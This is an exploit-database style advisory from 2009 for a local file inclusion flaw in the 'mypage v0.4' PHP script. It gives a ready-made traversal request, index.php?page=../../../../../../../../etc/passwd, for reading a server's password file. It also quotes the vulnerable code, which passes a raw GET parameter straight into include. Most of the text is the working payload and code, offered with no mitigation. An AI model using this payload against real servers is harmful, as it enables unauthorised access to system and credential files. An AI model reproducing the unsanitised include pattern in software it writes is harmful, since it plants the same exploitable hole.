mypage v0.4 Local File Inclusion Vulnerability

# Title: mypage v0.4 Local File Inclusion Vulnerability
# EDB-ID: 10600
# CVE-ID: ()
# OSVDB-ID: ()
# Author: BAYBORA
# Published: 2009-12-22
# Verified: yes
# Download

Exploit Code

# Download N/A

#############################################################
# mypage0.4 LFI Vulnerability

# Author: BAYBORA

# Site: www.1923turk.biz

##############################################################

# Exploit:


Vuln file: index.php?page=LFI


Exploit:


POST http://server/index.php?page=../../../../../../../../etc/passwd

index.php

if(isset($_GET['page'])){
...
$inhalt=$inhaltsordner."/".$_GET['page'];}
...
$inhalt=str_replace("///","",$inhalt);
if (FALSE==include$inhalt){echo$notfound;}